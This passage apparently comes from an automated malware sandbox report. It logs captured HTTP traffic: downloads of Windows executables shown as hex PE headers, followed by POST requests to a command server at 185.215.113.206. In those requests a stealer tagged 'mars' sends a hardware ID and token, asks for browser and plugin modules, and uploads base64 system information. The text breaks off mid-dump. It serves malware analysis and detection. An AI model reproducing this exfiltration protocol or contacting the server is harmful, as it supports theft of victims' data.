00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 12 Nov 2024 05:23:38 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 12 Nov 2024 05:23:42 GMTContent-Type: application/octet-streamContent-Length: 3194368Last-Modified: Tue, 12 Nov 2024 05:07:35 GMTConnection: keep-aliveETag: "6732e297-30be00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 ca 01 00 00 00 00 00 00 d0 30 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 31 00 00 04 00 00 43 0b 31 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 b3 30 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 b3 30 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 80 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 92 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 76 6f 73 78 74 70 6f 79 00 10 2a 00 00 b0 06 00 00 04 2a 00 00 94 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 71 63 76 61 75 77 71 00 10 00 00 00 c0 30 00 00 04 00 00 00 98 30 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 30 00 00 22 00 00 00 9c 30 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 12 Nov 2024 05:24:09 GMTContent-Type: application/octet-streamContent-Length: 1816064Last-Modified: Tue, 12 Nov 2024 05:07:27 GMTConnection: keep-aliveETag: "6732e28f-1bb600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce ac e2 38 8a cd 8c 6b 8a cd 8c 6b 8a cd 8c 6b e5 bb 27 6b 92 cd 8c 6b e5 bb 12 6b 87 cd 8c 6b e5 bb 26 6b b0 cd 8c 6b 83 b5 0f 6b 89 cd 8c 6b 83 b5 1f 6b 88 cd 8c 6b 0a b4 8d 6a 89 cd 8c 6b 8a cd 8d 6b d1 cd 8c 6b e5 bb 23 6b 98 cd 8c 6b e5 bb 11 6b 8b cd 8c 6b 52 69 63 68 8a cd 8c 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4f c3 2f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 40 22 00 00 00 00 00 00 80 69 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 b0 69 00 00 04 00 00 46 fe 1b 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 62 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 a0 24 00 00 00 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 90 2a 00 00 c0 24 00 00 02 00 00 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 75 75 73 71 63 67 6e 00 20 1a 00 00 50 4f 00 00 1a 1a 00 00 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 63 69 6f 6d 6b 6c 67 00 10 00 00 00 70 69 00 00 04 00 00 00 90 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 80 69 00 00 22 00 00 00 94 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 12 Nov 2024 05:24:22 GMTContent-Type: application/octet-streamContent-Length: 2871296Last-Modified: Tue, 12 Nov 2024 05:06:30 GMTConnection: keep-aliveETag: "6732e256-2bd000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 40 2c 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 2c 00 00 04 00 00 ed 2f 2c 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 72 66 62 6d 75 6e 66 63 00 80 2b 00 00 a0 00 00 00 6e 2b 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 71 78 68 68 71 78 79 00 20 00 00 00 20 2c 00 00 06 00 00 00 a8 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 40 2c 00 00 22 00 00 00 ae 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBAKEBGIIDAFIDHIIECFHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 41 4b 45 42 47 49 49 44 41 46 49 44 48 49 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 30 30 45 43 33 35 30 44 46 31 46 31 36 32 32 33 37 39 37 30 33 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 4b 45 42 47 49 49 44 41 46 49 44 48 49 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 4b 45 42 47 49 49 44 41 46 49 44 48 49 49 45 43 46 2d 2d 0d 0a Data Ascii: ------CBAKEBGIIDAFIDHIIECFContent-Disposition: form-data; name="hwid"A00EC350DF1F1622379703------CBAKEBGIIDAFIDHIIECFContent-Disposition: form-data; name="build"mars------CBAKEBGIIDAFIDHIIECF--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAEBFHJKJEBFCBFHDAEGHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 45 42 46 48 4a 4b 4a 45 42 46 43 42 46 48 44 41 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 61 35 39 65 39 61 36 64 30 63 65 38 37 65 39 63 38 35 39 30 33 64 62 63 62 30 32 37 37 31 34 30 35 36 35 36 66 32 36 32 33 35 62 63 36 35 33 62 61 61 62 35 30 36 65 33 39 65 31 31 33 39 66 38 65 34 62 35 36 64 62 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 42 46 48 4a 4b 4a 45 42 46 43 42 46 48 44 41 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 42 46 48 4a 4b 4a 45 42 46 43 42 46 48 44 41 45 47 2d 2d 0d 0a Data Ascii: ------DAEBFHJKJEBFCBFHDAEGContent-Disposition: form-data; name="token"5a59e9a6d0ce87e9c85903dbcb02771405656f26235bc653baab506e39e1139f8e4b56db------DAEBFHJKJEBFCBFHDAEGContent-Disposition: form-data; name="message"browsers------DAEBFHJKJEBFCBFHDAEG--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEBKJDAFHJDGDHJKKEGIHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 42 4b 4a 44 41 46 48 4a 44 47 44 48 4a 4b 4b 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 61 35 39 65 39 61 36 64 30 63 65 38 37 65 39 63 38 35 39 30 33 64 62 63 62 30 32 37 37 31 34 30 35 36 35 36 66 32 36 32 33 35 62 63 36 35 33 62 61 61 62 35 30 36 65 33 39 65 31 31 33 39 66 38 65 34 62 35 36 64 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 4a 44 41 46 48 4a 44 47 44 48 4a 4b 4b 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 4a 44 41 46 48 4a 44 47 44 48 4a 4b 4b 45 47 49 2d 2d 0d 0a Data Ascii: ------JEBKJDAFHJDGDHJKKEGIContent-Disposition: form-data; name="token"5a59e9a6d0ce87e9c85903dbcb02771405656f26235bc653baab506e39e1139f8e4b56db------JEBKJDAFHJDGDHJKKEGIContent-Disposition: form-data; name="message"plugins------JEBKJDAFHJDGDHJKKEGI--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJKJDAEBFCBKECBGDBFCHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4b 4a 44 41 45 42 46 43 42 4b 45 43 42 47 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 61 35 39 65 39 61 36 64 30 63 65 38 37 65 39 63 38 35 39 30 33 64 62 63 62 30 32 37 37 31 34 30 35 36 35 36 66 32 36 32 33 35 62 63 36 35 33 62 61 61 62 35 30 36 65 33 39 65 31 31 33 39 66 38 65 34 62 35 36 64 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4b 4a 44 41 45 42 46 43 42 4b 45 43 42 47 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4b 4a 44 41 45 42 46 43 42 4b 45 43 42 47 44 42 46 43 2d 2d 0d 0a Data Ascii: ------JJKJDAEBFCBKECBGDBFCContent-Disposition: form-data; name="token"5a59e9a6d0ce87e9c85903dbcb02771405656f26235bc653baab506e39e1139f8e4b56db------JJKJDAEBFCBKECBGDBFCContent-Disposition: form-data; name="message"fplugins------JJKJDAEBFCBKECBGDBFC--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHIDHCAAKECGCBFIJDBHost: 185.215.113.206Content-Length: 5819Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHIDHCAAKECGCBFIJDBHost: 185.215.113.206Content-Length: 5819Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 48 49 44 48 43 41 41 4b 45 43 47 43 42 46 49 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 61 35 39 65 39 61 36 64 30 63 65 38 37 65 39 63 38 35 39 30 33 64 62 63 62 30 32 37 37 31 34 30 35 36 35 36 66 32 36 32 33 35 62 63 36 35 33 62 61 61 62 35 30 36 65 33 39 65 31 31 33 39 66 38 65 34 62 35 36 64 62 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 49 44 48 43 41 41 4b 45 43 47 43 42 46 49 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 6c 7a 64 47 56 74 58 32 6c 75 5a 6d 38 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 49 44 48 43 41 41 4b 45 43 47 43 42 46 49 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 43 6b 35 6c 64 48 64 76 63 6d 73 67 53 57 35 6d 62 7a 6f 4b 43 53 30 67 53 56 41 36 49 45 6c 51 50 77 6f 4a 4c 53 42 44 62 33 56 75 64 48 4a 35 4f 69 42 4a 55 30 38 2f 43 67 70 54 65 58 4e 30 5a 57 30 67 55 33 56 74 62 57 46 79 65 54 6f 4b 43 53 30 67 53 46 64 4a 52 44 6f 67 51 54 41 77 52 55 4d 7a 4e 54 42 45 52 6a 46 47 4d 54 59 79 4d 6a 4d 33 4f 54 63 77 4d 77 6f 4a 4c 53 42 50 55 7a 6f 67 56 32 6c 75 5a 47 39 33 63 79 41 78 4d 43 42 51 63 6d 38 4b 43 53 30 67 51 58 4a 6a 61 47 6c 30 5a 57 4e 30 64 58 4a 6c 4f 69 42 34 4e 6a 51 4b 43 53 30 67 56 58 4e 6c 63 6b 35 68 62 57 55 36 49 47 46 73 5a 6d 39 75 63 77 6f 4a 4c 53 42 44 62 32 31 77 64 58 52 6c 63 69 42 4f 59 57 31 6c 4f 69 41 34 4f 54 6b 31 4e 54 49 4b 43 53 30 67 54 47 39 6a 59 57 77 67 56 47 6c 74 5a 54 6f 67 4d 6a 41 79 4e 43 38 78 4d 53 38 78 4d 69 41 77 4f 6a 49 7a 4f 6a 4d 4b 43 53 30 67 56 56 52 44 4f 69 41 74 4e 51 6f 4a 4c 53 42 4d 59 57 35 6e 64 57 46 6e 5a 54 6f 67 5a 57 34 74 51 30 67 4b 43 53 30 67 53 32 56 35 59 6d 39 68 63 6d 52 7a 4f 69 42 46 62 6d 64 73 61 58 4e 6f 49 43 68 56 62 6d 6c 30 5a 57 51 67 53 32 6c 75 5a 32 52 76 62 53 6b 67 4c 79 42 46 62 6d 64 73 61 58 4e 6f 49 43 68 56 62 6d 6c 30 5a 57 51 67 53 32 6c 75 5a 32 52 76 62 53 6b 4b 43 53 30 67 54 47 46 77 64 47 39 77 4f 69 42 47 51 55 78 54 52 51 6f 4a 4c 53 42 53 64 57 35 75 61 57 35 6e 49 46 42 68 64 47 67 36 49 45 4d 36 58 46 56 7a 5a 58 4a 7a 58 47 46 73 5a 6d 39 75 63 31 78 45 5a 58 4e 72 64 47 39 77 58 47 5a 70 62 47 55 75 5a 58 68 6c 43 67 6b 74 49 45 4e 51 56 54 6f 67 53 57 35 30 5a 57 77 6f 55 69 6b 67 51 32 39 79 5a 53 68 55 54 53 